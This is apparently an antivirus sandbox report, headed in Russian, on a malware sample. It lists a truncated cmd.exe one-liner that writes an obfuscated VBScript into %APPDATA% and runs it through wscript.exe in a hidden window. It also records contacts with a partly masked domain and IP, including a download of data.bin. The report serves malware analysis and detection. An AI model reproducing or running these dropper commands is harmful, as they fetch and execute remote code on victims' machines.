Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "PP9k=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm Jq" "Ozlfi=55" "W7u3uie" "fUNCtiON W1(BB9Ajva,Jm4o8Az)" "GEt3Iq=83" "DiM XNySXQ,Xz1NN,NfOklO,Nv,Rjdrab(5)" "Xn=60" "Rjdrab(3)=50" "F0...
- %APPDATA%\24731.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\24731.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "PP9k=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm Jq" "Ozlfi=55" "W7u3uie" "fUNCtiON W1(BB9Ajva,Jm4o8Az)" "GEt3Iq=83" "DiM XNySXQ,Xz1NN,NfOklO,Nv,Rjdrab(5)" "Xn=60" "Rjdrab(3)=50" "F0...' (со скрытым окном)